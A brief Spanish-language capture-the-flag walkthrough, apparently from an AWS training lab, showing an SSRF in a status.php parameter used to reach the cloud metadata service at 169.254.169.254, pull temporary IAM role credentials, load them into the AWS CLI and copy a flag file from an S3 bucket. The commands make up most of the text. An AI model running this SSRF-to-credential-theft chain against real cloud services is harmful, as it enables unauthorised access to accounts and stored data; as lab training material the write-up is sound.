SSRF to Pwned
Aws PwnedLabs
Vemos la pagina web que se entrega al principio del laboratorio.
whatweb http://app.huge-logistics.com

cloud_enum -k "huge-logistics.com" --disable-azure --disable-gcp
Trato de hacer un cloud_enum con la pagina pero no tengo resultados.

En la pagina veo la direccion del bucket.

Hago un curl.
curl -I http://app.huge-logistics.com/

169.254.169.254/latest/meta-data/iam/info
Intentemos explotar la vulnerabilidad SSRF solicitando la dirección IP de enlace local 169.254.169.254 que aloja el servicio de metadatos.

curl -s https://app.huge-logistics.com/status/status.php?name=169.254.169.254/latest/meta-data/iam/info |awk '/^{/{flag=1} flag; /^}/{flag=0}' | jq
Hacemos otro curl a la direccion y encontramos lo siguiente:

Ahora con MetapwnedS3Access.
curl -s https://app.huge-logistics.com/status/status.php?name=169.254.169.254/latest/meta-data/iam/security-credentials/MetapwnedS3Access|awk '/^{/{flag=1} flag; /^}/{flag=0}' | jq

aws configure
Metemos la informacion para configurar nuestro usuario.
aws sts get-caller-identity
Hacemos un tipo whoami de aws.

Tratamos de ver que archivos tenemos en el bucket.
aws s3 ls huge-logistics-storage --recursive

Vemos que se encuentra el flag.
aws s3 cp s3://huge-logistics-storage/backup/flag.txt .
batcat flag.txt
